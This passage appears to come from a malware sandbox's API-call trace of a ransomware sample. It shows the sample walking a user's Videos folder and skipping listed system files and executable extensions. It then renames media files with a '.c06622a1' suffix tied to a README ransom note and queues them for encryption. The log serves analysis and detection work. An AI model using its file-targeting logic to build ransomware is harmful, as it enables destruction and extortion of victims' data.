nFileSizeHigh=0x0, nFileSizeLow=0x3df5, dwReserved0=0x0, dwReserved1=0x0, cFileName="nkwyTi.swf", cAlternateFileName="")) returned 1 [0156.574] _wcsicmp (_Str1="nkwyTi.swf", _Str2="README.c06622a1.TXT") returned -4 [0156.574] wcsstr (_Str="nkwyTi.swf", _SubStr="README") returned 0x0 [0156.574] _wcsicmp (_Str1="autorun.inf", _Str2="nkwyTi.swf") returned -13 [0156.574] wcslen (_String="autorun.inf") returned 0xb [0156.574] _wcsicmp (_Str1="boot.ini", _Str2="nkwyTi.swf") returned -12 [0156.574] wcslen (_String="boot.ini") returned 0x8 [0156.574] _wcsicmp (_Str1="bootfont.bin", _Str2="nkwyTi.swf") returned -12 [0156.574] wcslen (_String="bootfont.bin") returned 0xc [0156.574] _wcsicmp (_Str1="bootsect.bak", _Str2="nkwyTi.swf") returned -12 [0156.574] wcslen (_String="bootsect.bak") returned 0xc [0156.574] _wcsicmp (_Str1="desktop.ini", _Str2="nkwyTi.swf") returned -10 [0156.574] wcslen (_String="desktop.ini") returned 0xb [0156.574] _wcsicmp (_Str1="iconcache.db", _Str2="nkwyTi.swf") returned -5 [0156.574] wcslen (_String="iconcache.db") returned 0xc [0156.574] _wcsicmp (_Str1="ntldr", _Str2="nkwyTi.swf") returned 9 [0156.575] wcslen (_String="ntldr") returned 0x5 [0156.575] _wcsicmp (_Str1="ntuser.dat", _Str2="nkwyTi.swf") returned 9 [0156.575] wcslen (_String="ntuser.dat") returned 0xa [0156.575] _wcsicmp (_Str1="ntuser.dat.log", _Str2="nkwyTi.swf") returned 9 [0156.575] wcslen (_String="ntuser.dat.log") returned 0xe [0156.575] _wcsicmp (_Str1="ntuser.ini", _Str2="nkwyTi.swf") returned 9 [0156.575] wcslen (_String="ntuser.ini") returned 0xa [0156.575] _wcsicmp (_Str1="thumbs.db", _Str2="nkwyTi.swf") returned 6 [0156.575] wcslen (_String="thumbs.db") returned 0x9 [0156.575] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.575] wcslen (_String="386") returned 0x3 [0156.575] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.575] wcslen (_String="adv") returned 0x3 [0156.575] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.575] wcslen (_String="ani") returned 0x3 [0156.575] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.575] wcslen (_String="bat") returned 0x3 [0156.575] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.575] wcslen (_String="bin") returned 0x3 [0156.575] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.575] wcslen (_String="cab") returned 0x3 [0156.575] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.575] wcslen (_String="cmd") returned 0x3 [0156.575] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.575] wcslen (_String="com") returned 0x3 [0156.575] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.575] wcslen (_String="cpl") returned 0x3 [0156.575] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.575] wcslen (_String="cur") returned 0x3 [0156.575] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.575] wcslen (_String="deskthemepack") returned 0xd [0156.575] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.575] wcslen (_String="diagcab") returned 0x7 [0156.575] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.575] wcslen (_String="diagcfg") returned 0x7 [0156.575] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.575] wcslen (_String="diagpkg") returned 0x7 [0156.575] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.576] wcslen (_String="dll") returned 0x3 [0156.576] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.576] wcslen (_String="drv") returned 0x3 [0156.576] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.576] wcslen (_String="exe") returned 0x3 [0156.576] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.576] wcslen (_String="hlp") returned 0x3 [0156.576] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.576] wcslen (_String="icl") returned 0x3 [0156.576] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.576] wcslen (_String="icns") returned 0x4 [0156.576] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.576] wcslen (_String="ico") returned 0x3 [0156.576] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.576] wcslen (_String="ics") returned 0x3 [0156.576] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.576] wcslen (_String="idx") returned 0x3 [0156.576] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.576] wcslen (_String="ldf") returned 0x3 [0156.576] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.576] wcslen (_String="lnk") returned 0x3 [0156.576] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.576] wcslen (_String="mod") returned 0x3 [0156.576] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.576] wcslen (_String="mpa") returned 0x3 [0156.576] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.576] wcslen (_String="msc") returned 0x3 [0156.576] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.576] wcslen (_String="msp") returned 0x3 [0156.576] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.576] wcslen (_String="msstyles") returned 0x8 [0156.576] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.576] wcslen (_String="msu") returned 0x3 [0156.576] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.576] wcslen (_String="nls") returned 0x3 [0156.576] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.577] wcslen (_String="nomedia") returned 0x7 [0156.577] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.577] wcslen (_String="ocx") returned 0x3 [0156.577] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.577] wcslen (_String="prf") returned 0x3 [0156.577] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.577] wcslen (_String="ps1") returned 0x3 [0156.577] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.577] wcslen (_String="rom") returned 0x3 [0156.577] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.577] wcslen (_String="rtp") returned 0x3 [0156.577] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.577] wcslen (_String="scr") returned 0x3 [0156.577] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.577] wcslen (_String="shs") returned 0x3 [0156.577] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.577] wcslen (_String="spl") returned 0x3 [0156.577] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.577] wcslen (_String="sys") returned 0x3 [0156.577] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.577] wcslen (_String="theme") returned 0x5 [0156.577] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.577] wcslen (_String="themepack") returned 0x9 [0156.577] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.577] wcslen (_String="wpx") returned 0x3 [0156.577] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.577] wcslen (_String="lock") returned 0x4 [0156.577] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.577] wcslen (_String="key") returned 0x3 [0156.577] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.577] wcslen (_String="hta") returned 0x3 [0156.577] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.577] wcslen (_String="msi") returned 0x3 [0156.577] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.577] wcslen (_String="pdb") returned 0x3 [0156.577] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0156.577] wcslen (_String="sql") returned 0x3 [0156.577] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.578] wcslen (_String="sqlite") returned 0x6 [0156.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.578] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.578] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.578] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned 0x4b [0156.578] wcscpy (in: _Dest=0x4560158, _Source="nkwyTi.swf" | out: _Dest="nkwyTi.swf") returned="nkwyTi.swf" [0156.578] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf", dwFileAttributes=0x80) returned 1 [0156.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\nkwyti.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0156.578] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.578] ReadFile (in: hFile=0x664, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.579] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0xe44c6cbc [0156.579] RtlComputeCrc32 (PartialCrc=0x6cbc, Buffer=0x3fe3f4, Length=0x80) returned 0xe39ec022 [0156.579] RtlComputeCrc32 (PartialCrc=0xc022, Buffer=0x3fe3f4, Length=0x80) returned 0x227a14e1 [0156.579] RtlComputeCrc32 (PartialCrc=0x14e1, Buffer=0x3fe3f4, Length=0x80) returned 0x1f3b58a4 [0156.579] RtlComputeCrc32 (PartialCrc=0x58a4, Buffer=0x3fe3f4, Length=0x80) returned 0x6fbc0db4 [0156.579] CloseHandle (hObject=0x664) returned 1 [0156.579] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.579] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf" [0156.579] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf") returned 0x56 [0156.579] wcscpy (in: _Dest=0x4570174, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.579] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\nkwyti.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\nkwyti.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\nkwyTi.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\nkwyti.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x664 [0156.582] CreateIoCompletionPort (FileHandle=0x664, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.582] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0156.587] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3826c252 [0156.587] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x733feaa3 [0156.587] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55ed8902 [0156.587] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x542be55d [0156.587] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x63947b86 [0156.588] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c9dbb0f [0156.588] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a905619 [0156.588] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x285d491 [0156.591] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x7404e7cb [0156.591] RtlComputeCrc32 (PartialCrc=0xe7cb, Buffer=0x4700094, Length=0x80) returned 0x7a6f16b7 [0156.591] RtlComputeCrc32 (PartialCrc=0x16b7, Buffer=0x4700094, Length=0x80) returned 0xc392e53c [0156.591] RtlComputeCrc32 (PartialCrc=0xe53c, Buffer=0x4700094, Length=0x80) returned 0x88adcef3 [0156.591] RtlComputeCrc32 (PartialCrc=0xcef3, Buffer=0x4700094, Length=0x80) returned 0xc1c5ff2c [0156.591] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0156.591] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.591] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.591] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe668e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbe668e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbe668e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.591] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.591] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4bab7b0, ftCreationTime.dwHighDateTime=0x1d5e58e, ftLastAccessTime.dwLowDateTime=0x26af2620, ftLastAccessTime.dwHighDateTime=0x1d5d825, ftLastWriteTime.dwLowDateTime=0x26af2620, ftLastWriteTime.dwHighDateTime=0x1d5d825, nFileSizeHigh=0x0, nFileSizeLow=0xe051, dwReserved0=0x0, dwReserved1=0x0, cFileName="URW1HXnF.mkv", cAlternateFileName="")) returned 1 [0156.591] _wcsicmp (_Str1="URW1HXnF.mkv", _Str2="README.c06622a1.TXT") returned 3 [0156.591] wcsstr (_Str="URW1HXnF.mkv", _SubStr="README") returned 0x0 [0156.591] _wcsicmp (_Str1="autorun.inf", _Str2="URW1HXnF.mkv") returned -20 [0156.591] wcslen (_String="autorun.inf") returned 0xb [0156.591] _wcsicmp (_Str1="boot.ini", _Str2="URW1HXnF.mkv") returned -19 [0156.591] wcslen (_String="boot.ini") returned 0x8 [0156.591] _wcsicmp (_Str1="bootfont.bin", _Str2="URW1HXnF.mkv") returned -19 [0156.591] wcslen (_String="bootfont.bin") returned 0xc [0156.591] _wcsicmp (_Str1="bootsect.bak", _Str2="URW1HXnF.mkv") returned -19 [0156.591] wcslen (_String="bootsect.bak") returned 0xc [0156.591] _wcsicmp (_Str1="desktop.ini", _Str2="URW1HXnF.mkv") returned -17 [0156.591] wcslen (_String="desktop.ini") returned 0xb [0156.592] _wcsicmp (_Str1="iconcache.db", _Str2="URW1HXnF.mkv") returned -12 [0156.592] wcslen (_String="iconcache.db") returned 0xc [0156.592] _wcsicmp (_Str1="ntldr", _Str2="URW1HXnF.mkv") returned -7 [0156.592] wcslen (_String="ntldr") returned 0x5 [0156.592] _wcsicmp (_Str1="ntuser.dat", _Str2="URW1HXnF.mkv") returned -7 [0156.592] wcslen (_String="ntuser.dat") returned 0xa [0156.592] _wcsicmp (_Str1="ntuser.dat.log", _Str2="URW1HXnF.mkv") returned -7 [0156.592] wcslen (_String="ntuser.dat.log") returned 0xe [0156.592] _wcsicmp (_Str1="ntuser.ini", _Str2="URW1HXnF.mkv") returned -7 [0156.592] wcslen (_String="ntuser.ini") returned 0xa [0156.592] _wcsicmp (_Str1="thumbs.db", _Str2="URW1HXnF.mkv") returned -1 [0156.592] wcslen (_String="thumbs.db") returned 0x9 [0156.592] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.592] wcslen (_String="386") returned 0x3 [0156.592] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.592] wcslen (_String="adv") returned 0x3 [0156.592] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.592] wcslen (_String="ani") returned 0x3 [0156.592] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.592] wcslen (_String="bat") returned 0x3 [0156.592] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.592] wcslen (_String="bin") returned 0x3 [0156.592] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.592] wcslen (_String="cab") returned 0x3 [0156.592] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.592] wcslen (_String="cmd") returned 0x3 [0156.592] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.592] wcslen (_String="com") returned 0x3 [0156.592] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.592] wcslen (_String="cpl") returned 0x3 [0156.592] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.592] wcslen (_String="cur") returned 0x3 [0156.592] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.592] wcslen (_String="deskthemepack") returned 0xd [0156.592] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.593] wcslen (_String="diagcab") returned 0x7 [0156.593] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.593] wcslen (_String="diagcfg") returned 0x7 [0156.593] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.593] wcslen (_String="diagpkg") returned 0x7 [0156.593] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.593] wcslen (_String="dll") returned 0x3 [0156.593] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.593] wcslen (_String="drv") returned 0x3 [0156.593] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.593] wcslen (_String="exe") returned 0x3 [0156.593] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.593] wcslen (_String="hlp") returned 0x3 [0156.593] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.593] wcslen (_String="icl") returned 0x3 [0156.593] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.593] wcslen (_String="icns") returned 0x4 [0156.593] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.593] wcslen (_String="ico") returned 0x3 [0156.593] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.593] wcslen (_String="ics") returned 0x3 [0156.593] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.593] wcslen (_String="idx") returned 0x3 [0156.593] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.593] wcslen (_String="ldf") returned 0x3 [0156.593] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.593] wcslen (_String="lnk") returned 0x3 [0156.593] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.593] wcslen (_String="mod") returned 0x3 [0156.593] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.593] wcslen (_String="mpa") returned 0x3 [0156.593] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.593] wcslen (_String="msc") returned 0x3 [0156.593] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.593] wcslen (_String="msp") returned 0x3 [0156.593] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.593] wcslen (_String="msstyles") returned 0x8 [0156.593] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.593] wcslen (_String="msu") returned 0x3 [0156.594] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.594] wcslen (_String="nls") returned 0x3 [0156.594] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.594] wcslen (_String="nomedia") returned 0x7 [0156.594] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.594] wcslen (_String="ocx") returned 0x3 [0156.594] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.594] wcslen (_String="prf") returned 0x3 [0156.594] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.594] wcslen (_String="ps1") returned 0x3 [0156.594] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.594] wcslen (_String="rom") returned 0x3 [0156.594] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.594] wcslen (_String="rtp") returned 0x3 [0156.594] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.594] wcslen (_String="scr") returned 0x3 [0156.594] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.594] wcslen (_String="shs") returned 0x3 [0156.594] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.594] wcslen (_String="spl") returned 0x3 [0156.594] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.594] wcslen (_String="sys") returned 0x3 [0156.594] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.594] wcslen (_String="theme") returned 0x5 [0156.594] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.594] wcslen (_String="themepack") returned 0x9 [0156.594] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.594] wcslen (_String="wpx") returned 0x3 [0156.594] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.594] wcslen (_String="lock") returned 0x4 [0156.594] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.594] wcslen (_String="key") returned 0x3 [0156.594] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.594] wcslen (_String="hta") returned 0x3 [0156.594] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.594] wcslen (_String="msi") returned 0x3 [0156.594] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.594] wcslen (_String="pdb") returned 0x3 [0156.594] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.595] wcslen (_String="sql") returned 0x3 [0156.595] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.595] wcslen (_String="sqlite") returned 0x6 [0156.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.595] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.595] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.595] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned 0x4b [0156.595] wcscpy (in: _Dest=0x4560158, _Source="URW1HXnF.mkv" | out: _Dest="URW1HXnF.mkv") returned="URW1HXnF.mkv" [0156.595] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv", dwFileAttributes=0x80) returned 1 [0156.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\urw1hxnf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0156.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.595] ReadFile (in: hFile=0x134, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.596] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x9357ac65 [0156.596] RtlComputeCrc32 (PartialCrc=0xac65, Buffer=0x3fe3f4, Length=0x80) returned 0x12e47793 [0156.596] RtlComputeCrc32 (PartialCrc=0x7793, Buffer=0x3fe3f4, Length=0x80) returned 0xc720ef4c [0156.596] RtlComputeCrc32 (PartialCrc=0xef4c, Buffer=0x3fe3f4, Length=0x80) returned 0x926c82a6 [0156.596] RtlComputeCrc32 (PartialCrc=0x82a6, Buffer=0x3fe3f4, Length=0x80) returned 0x9c7eda37 [0156.596] CloseHandle (hObject=0x134) returned 1 [0156.596] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.596] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\URW1HXnF.mkv" [0156.596] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS 